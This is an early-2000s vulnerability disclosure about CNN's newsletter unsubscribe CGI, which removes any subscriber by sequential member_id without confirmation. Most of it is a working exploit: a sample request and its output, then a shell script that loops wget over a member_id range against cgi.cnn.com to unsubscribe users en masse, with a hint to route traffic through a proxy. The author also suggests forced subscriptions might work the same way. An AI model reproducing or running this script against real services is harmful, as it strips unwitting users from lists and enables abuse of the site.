CNN List Un-Subscribe bot # Date: 8/22/01 # Author: Jay Daniels PROBLEM: Anyone can Un-Subscribe other users from CNN's distribution list by placing a random number at the end of unsubscribe cgi URL's member_id. CAUSE: There is no confirmation request! I can't remember if there is a confirmation request when subscribing, if not then a similar method could be used to post/subscribe others without their knowledge. [example: quicknews] http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=3465865 [output] >User removed >The email address jay@thecompany.com has been removed from the e-wiretext >distribution list(s). This change should take effect within 24 hours. I do not know the exact range for member_id so you can just start at [start_memid] and go up. Now you could make a simple shell script to do this using wget: #!/bin/sh # you may want to use a proxy or adjust wget options see %wget -h # path for wget path="/usr/bin" if [ $# != 2 ]; then echo "Usage: $0 [start_memid] [stop_memid]" exit 1 fi count=$(($1)) while [ "$count" -le "$2" ]; do $path/wget -a $0.log http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=$count count=$(($count + 1)) done exit 0